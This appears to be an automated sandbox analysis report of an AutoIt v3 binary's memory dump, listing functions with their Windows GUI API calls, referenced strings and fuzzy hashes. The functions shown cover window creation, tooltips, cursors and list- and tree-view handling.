Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 13dd58b2d8e27c02550a31140541b6adccb0bcc1651e9fa4ef8706b02aa6a7ce
Instruction ID: 73166cac7d032ac82fbd264b1d817295b4f9b0ace754d4b222b00d34227b0cae
Opcode Fuzzy Hash: 13dd58b2d8e27c02550a31140541b6adccb0bcc1651e9fa4ef8706b02aa6a7ce
Instruction Fuzzy Hash: A312AE74504209EFDB24CF24CA84BB9BBE8FF45311F1485A9F695DB662C732E882CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A377BE, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00A377F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A378B0
SetRect.USER32 ref: 00A378EE
AdjustWindowRectEx.USER32(?,88C00000,?,00000006), ref: 00A37900
CreateWindowExW.USER32 ref: 00A37946
GetClientRect.USER32 ref: 00A37952
CreateWindowExW.USER32 ref: 00A37996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A379A5
GetStockObject.GDI32(00000011), ref: 00A379B5
SelectObject.GDI32(00000000,00000000), ref: 00A379B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A379C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A379D2
DeleteDC.GDI32(00000000), ref: 00A379DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00A37A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00A37A1E
CreateWindowExW.USER32 ref: 00A37A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A37A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00A37A7E
CreateWindowExW.USER32 ref: 00A37AAE
GetStockObject.GDI32(00000011), ref: 00A37AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A37AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A37ACE

Strings

DISPLAY, xrefs: 00A3799B
msctls_progress32, xrefs: 00A37A4F
static, xrefs: 00A37990, 00A37AA8
AutoIt v3, xrefs: 00A3793E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 40a9dfc5a4987886df48b7ea6938ed682bdd46302411cd48dbdb09ac5cce2df1
Instruction ID: 65e5912294facaec205a1d7828760ab62492be3fbfcab856a22abf8c53b8db60
Opcode Fuzzy Hash: 40a9dfc5a4987886df48b7ea6938ed682bdd46302411cd48dbdb09ac5cce2df1
Instruction Fuzzy Hash: C6A170B5A40219BFEB14DBA8DC4AFAF7BB9EB85710F004114FA14A71E0D775AD01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A49C8B, Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 465windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00A49D41
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A49DFA
SendMessageW.USER32(?,00001102,00000002,?), ref: 00A49E16

Strings

0, xrefs: 00A49E53

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 7b1aad41b3d9c094840cb50661b7904623db11045018d2dd4b7775e601024686
Instruction ID: 0796fbb0751280c4eefb7b9c05491d1ecd1337e4ef55ce5abd2fb831d1bc48d6
Opcode Fuzzy Hash: 7b1aad41b3d9c094840cb50661b7904623db11045018d2dd4b7775e601024686
Instruction Fuzzy Hash: 2F020D39108300AFE714CF24C849BABBBE4FFDA314F04862DF59A962A1C7759915CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AB60, Relevance: 39.2, APIs: 26, Instructions: 206windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A4AB99
SetTextColor.GDI32(?,00A4A869), ref: 00A4AB9D
GetSysColorBrush.USER32(0000000F), ref: 00A4ABB3
GetSysColor.USER32(0000000F), ref: 00A4ABBE
CreateSolidBrush.GDI32(?), ref: 00A4ABC3
GetSysColor.USER32(00000011), ref: 00A4ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A4ABE9
SelectObject.GDI32(?,00000000), ref: 00A4ABFA
SetBkColor.GDI32(?,?), ref: 00A4AC03
SelectObject.GDI32(?,?), ref: 00A4AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00A4AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A4AC46
GetWindowLongW.USER32 ref: 00A4AC5B
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A4ACA7
GetWindowTextW.USER32 ref: 00A4ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00A4ACEC
DrawFocusRect.USER32 ref: 00A4ACF7
GetSysColor.USER32(00000011), ref: 00A4AD05
SetTextColor.GDI32(?,00000000), ref: 00A4AD0D
DrawTextW.USER32 ref: 00A4AD21
SelectObject.GDI32(?,?), ref: 00A4AD38
DeleteObject.GDI32(?), ref: 00A4AD43
SelectObject.GDI32(?,?), ref: 00A4AD49
DeleteObject.GDI32(?), ref: 00A4AD4E
SetTextColor.GDI32(?,?), ref: 00A4AD54
SetBkColor.GDI32(?,?), ref: 00A4AD5E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 875143a8705ea085f572364e11740fb5462e5ca7de4466c93052aa68cd3d5972
Instruction ID: 05cf71f786f2e87b57de20bc226073fc95bdc2c12bd764db20e412eb135045c3
Opcode Fuzzy Hash: 875143a8705ea085f572364e11740fb5462e5ca7de4466c93052aa68cd3d5972
Instruction Fuzzy Hash: 02617079800118FFDB11DFE8DC48EAE7B79EB89320F214225F915AA1A1D7729D41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A44B16, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A44C51
GetDesktopWindow.USER32 ref: 00A44C66
GetWindowRect.USER32 ref: 00A44C6D
GetWindowLongW.USER32 ref: 00A44CCF
DestroyWindow.USER32(?), ref: 00A44CFB
CreateWindowExW.USER32 ref: 00A44D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A44D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A44D68
SendMessageW.USER32(?,00000421,?,?), ref: 00A44D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A44D90
IsWindowVisible.USER32 ref: 00A44DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A44DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A44DDF
GetWindowRect.USER32 ref: 00A44DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00A44E1D
GetMonitorInfoW.USER32 ref: 00A44E37
CopyRect.USER32 ref: 00A44E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00A44EB9

Strings

0, xrefs: 00A44BFC
tooltips_class32, xrefs: 00A44D1D
(, xrefs: 00A44E2A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d91c4386a648c190b15a717f50bfa881ef05a2e975066ca77c8d43ad3c2292bb
Instruction ID: c6639c4e4641f76cb7c389ddbe482dceed8bd5aacaf27ae8c8a000985c2aaaca
Opcode Fuzzy Hash: d91c4386a648c190b15a717f50bfa881ef05a2e975066ca77c8d43ad3c2292bb
Instruction Fuzzy Hash: A7B15A75604341AFDB04DF64C889B6ABBE4FF89714F00891CF599AB2A1DB71EC05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A48C44, Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 403windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A48D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A48D45
CharNextW.USER32(0000014E), ref: 00A48D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A48DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A48DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A48DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A48DF9
SetWindowTextW.USER32(?,0000014E), ref: 00A48E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A48E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A48E8C
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A48EFA
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A48F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A48FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00A49088
InvalidateRect.USER32(?,00000000,?), ref: 00A490AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A490F4
SetMenuItemInfoW.USER32 ref: 00A49121
DrawMenuBar.USER32(?), ref: 00A49130
SetWindowTextW.USER32(?,0000014E), ref: 00A49158

Strings

0, xrefs: 00A490C2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1015379403-4108050209
Opcode ID: ed97e81724b32c0936e9ff874336dc695054c2fc22de9af74e14b805c8d46f28
Instruction ID: 1a5b1bffbcaf52980fad55528ad0130cee620d47dbf3b5e6b8cf4ef7b6caf994
Opcode Fuzzy Hash: ed97e81724b32c0936e9ff874336dc695054c2fc22de9af74e14b805c8d46f28
Instruction Fuzzy Hash: 47E1A078901209AFDF20DF94DC88EEF7BB8EF85310F008155F919AA290DB758A85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009C27D9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 293windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009C28BC
GetSystemMetrics.USER32 ref: 009C28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009C28EF
GetSystemMetrics.USER32 ref: 009C28F7
GetSystemMetrics.USER32 ref: 009C291C
SetRect.USER32 ref: 009C2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009C2949
CreateWindowExW.USER32 ref: 009C297C
SetWindowLongW.USER32 ref: 009C2990
GetClientRect.USER32 ref: 009C29AE
GetStockObject.GDI32(00000011), ref: 009C29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 009C29D5

Part of subcall function 009C2344: GetCursorPos.USER32(?), ref: 009C2357
Part of subcall function 009C2344: ScreenToClient.USER32 ref: 009C2374
Part of subcall function 009C2344: GetAsyncKeyState.USER32(00000001), ref: 009C2399
Part of subcall function 009C2344: GetAsyncKeyState.USER32(00000002), ref: 009C23A7

SetTimer.USER32 ref: 009C29FC

Strings

AutoIt v3 GUI, xrefs: 009C2974

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e4b914d25a7207b99965acfcd389854e6f3b5c47ba7b3c9402b44db5a5df8273
Instruction ID: ea3fa14434816d23eb198a88be789ff80bd3b82f57e341578f88fa580cb220d0
Opcode Fuzzy Hash: e4b914d25a7207b99965acfcd389854e6f3b5c47ba7b3c9402b44db5a5df8273
Instruction Fuzzy Hash: ECB18F75A0020AEFDB14DFA8DD45FAE7BB8FB48314F108629FA15E62D0CB75A841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A44069, Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?), ref: 00A440F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A441B6

Strings

ISSELECTED, xrefs: 00A441C1
DESELECT, xrefs: 00A442A4
GETSUBITEMCOUNT, xrefs: 00A44141
SELECTALL, xrefs: 00A4421D
GETITEMCOUNT, xrefs: 00A44128
FINDITEM, xrefs: 00A44329
GETSELECTEDCOUNT, xrefs: 00A44199
VIEWCHANGE, xrefs: 00A44375
GETSELECTED, xrefs: 00A442E4
GETTEXT, xrefs: 00A4415F
SELECT, xrefs: 00A44250
SELECTCLEAR, xrefs: 00A44235
SELECTINVERT, xrefs: 00A44286

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 3f981d0cf0678f94e10cec85a8476d688fef76e1538b11adeb2fe21c39bc1c34
Instruction ID: 802c43d18c3780e94c0988f298fbd930fd80a02305cda353a81d9741cccba396
Opcode Fuzzy Hash: 3f981d0cf0678f94e10cec85a8476d688fef76e1538b11adeb2fe21c39bc1c34
Instruction Fuzzy Hash: 58A18A742143419FCB14EF24C955FAAB3A5BFC8314F14896CB8AA9B2D2DB70EC45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A352F0, Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00A35309
LoadCursorW.USER32(00000000,00007F8A), ref: 00A35314
LoadCursorW.USER32(00000000,00007F00), ref: 00A3531F
LoadCursorW.USER32(00000000,00007F03), ref: 00A3532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00A35335
LoadCursorW.USER32(00000000,00007F01), ref: 00A35340
LoadCursorW.USER32(00000000,00007F81), ref: 00A3534B
LoadCursorW.USER32(00000000,00007F88), ref: 00A35356
LoadCursorW.USER32(00000000,00007F80), ref: 00A35361
LoadCursorW.USER32(00000000,00007F86), ref: 00A3536C
LoadCursorW.USER32(00000000,00007F83), ref: 00A35377
LoadCursorW.USER32(00000000,00007F85), ref: 00A35382
LoadCursorW.USER32(00000000,00007F82), ref: 00A3538D
LoadCursorW.USER32(00000000,00007F84), ref: 00A35398
LoadCursorW.USER32(00000000,00007F04), ref: 00A353A3
LoadCursorW.USER32(00000000,00007F02), ref: 00A353AE
GetCursorInfo.USER32(?), ref: 00A353BE
GetLastError.KERNEL32(00000001,00000000), ref: 00A353E9

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 2af83f79087eb6e600c35c676eb122a232aed396e4b4cdaae6b50b37df1e374b
Instruction ID: 2bdd6154a234405b400f7f6f58967dd0d7776e8cbb2cf70321599e1fbd0ad930
Opcode Fuzzy Hash: 2af83f79087eb6e600c35c676eb122a232aed396e4b4cdaae6b50b37df1e374b
Instruction Fuzzy Hash: 9D415370E043196ADB109FBA8C49D6EFFF8EF91B50F10452FB509E7291DAB8A5018E51

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C4C1, Relevance: 25.7, APIs: 17, Instructions: 171windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00A1C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A1C4E6
SetWindowTextW.USER32(?,?), ref: 00A1C4FD
GetDlgItem.USER32 ref: 00A1C512
SetWindowTextW.USER32(00000000,?), ref: 00A1C518
GetDlgItem.USER32 ref: 00A1C528
SetWindowTextW.USER32(00000000,?), ref: 00A1C52E
SendDlgItemMessageW.USER32 ref: 00A1C54F
SendDlgItemMessageW.USER32 ref: 00A1C569
GetWindowRect.USER32 ref: 00A1C572
SetWindowTextW.USER32(?,?), ref: 00A1C5DD
GetDesktopWindow.USER32 ref: 00A1C5E3
GetWindowRect.USER32 ref: 00A1C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A1C636
GetClientRect.USER32 ref: 00A1C643
PostMessageW.USER32 ref: 00A1C668
SetTimer.USER32 ref: 00A1C693

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: db411b29596e804da1d161addcff1b4d37af5a0a63beba944e250617f3263136
Instruction ID: 7e909ca2ec72841bc89c7d2212d560045c27fb9fe53274d3c14f573b1ef0085f
Opcode Fuzzy Hash: db411b29596e804da1d161addcff1b4d37af5a0a63beba944e250617f3263136
Instruction Fuzzy Hash: FB51BC34940709AFDB20DFA8CE89BAFBBF5FF44714F000928E686A25A0C775B945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A44619, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A446AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A446F6

Strings

COLLAPSE, xrefs: 00A4473C
GETSELECTED, xrefs: 00A44806
GETTEXT, xrefs: 00A44849
SELECT, xrefs: 00A448A7
ISCHECKED, xrefs: 00A44879
EXPAND, xrefs: 00A447A8
EXISTS, xrefs: 00A4475F
GETTOTALCOUNT, xrefs: 00A446DD
GETITEMCOUNT, xrefs: 00A447D8
UNCHECK, xrefs: 00A448D2
CHECK, xrefs: 00A44716

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 306924014d83197ba0163607b88ad22b3d7dfd8405bb458b5cab260fdd425ca1
Instruction ID: a0cfd4302fe8900c27e945b42be2ad5a9d729969efee2f51dd1670bcba6f4340
Opcode Fuzzy Hash: 306924014d83197ba0163607b88ad22b3d7dfd8405bb458b5cab260fdd425ca1
Instruction Fuzzy Hash: 7D9173786047019FCB14EF24C851B6AB7A1AFD8314F05885CF89A5B3A3CB71ED46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A428, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 209windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00A4A542
CreateWindowExW.USER32 ref: 00A4A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A4A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A4A5F1
DestroyWindow.USER32(00000000), ref: 00A4A613
CreateWindowExW.USER32 ref: 00A4A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A4A663
GetDesktopWindow.USER32 ref: 00A4A67C
GetWindowRect.USER32 ref: 00A4A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A4A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A4A6B3

Part of subcall function 009C25DB: GetWindowLongW.USER32 ref: 009C25EC

Strings

tooltips_class32, xrefs: 00A4A5B5, 00A4A643
0, xrefs: 00A4A4DE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
String ID: 0$tooltips_class32
API String ID: 1652260434-3619404913
Opcode ID: f2eb4c8979268c46b8b1b8529a131f1aa7e0b28b82e4febfa9d044ebb1119483
Instruction ID: 5c08b4a3ad8a4da4635ec4a69a1bd899be11297a8be53fdac8207319c1b6fcc2
Opcode Fuzzy Hash: f2eb4c8979268c46b8b1b8529a131f1aa7e0b28b82e4febfa9d044ebb1119483
Instruction Fuzzy Hash: 3671BF79180245AFE720CF68CC49F6ABBE5FBD9304F49452DF989872A1C771E902CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BAB8, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 202windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00A4BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,00A49431,?,?,?,?,?,?), ref: 00A4BBCA
LoadImageW.USER32 ref: 00A4BC03
LoadImageW.USER32 ref: 00A4BC46
LoadImageW.USER32 ref: 00A4BC7D
FreeLibrary.KERNEL32(?,?,?,?,?,00A49431,?,?,?,?,?,?), ref: 00A4BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A4BC99
DestroyIcon.USER32(?,?,?,?,?,00A49431,?,?,?,?,?,?), ref: 00A4BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A4BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A4BCD1

Strings

.exe, xrefs: 00A4BB04
.icl, xrefs: 00A4BAE4
.dll, xrefs: 00A4BB27

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 1446636887-1154884017
Opcode ID: d7cfb3af862abe4e845e960bbe4e940fa1f9154794a164e2584184e3d98e25b8
Instruction ID: b83c731539297b91f7de4ce0f37080d943ad894155809929b78da117876e9252
Opcode Fuzzy Hash: d7cfb3af862abe4e845e960bbe4e940fa1f9154794a164e2584184e3d98e25b8
Instruction Fuzzy Hash: 4761F075550218BEEB14DFA4DC86FBA7BACEB88721F10811AF815D60C1DB75E981CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C8EE, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 186windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

DragQueryPoint.SHELL32(?,?), ref: 00A4C917

Part of subcall function 00A4ADF1: ClientToScreen.USER32 ref: 00A4AE1A
Part of subcall function 00A4ADF1: GetWindowRect.USER32 ref: 00A4AE90
Part of subcall function 00A4ADF1: PtInRect.USER32(?,?,?), ref: 00A4AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00A4C980
DragQueryFileW.SHELL32(?,000000FF,?,?), ref: 00A4C98B
DragQueryFileW.SHELL32(?,?,?,00000104), ref: 00A4C9AE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A4C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00A4CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00A4CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00A4CA47
DragFinish.SHELL32(?), ref: 00A4CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A4CB41

Strings

@GUI_DRAGID, xrefs: 00A4CAB9
@GUI_DRAGFILE, xrefs: 00A4CAF0
@GUI_DROPID, xrefs: 00A4CA6E

Memory Dump Source

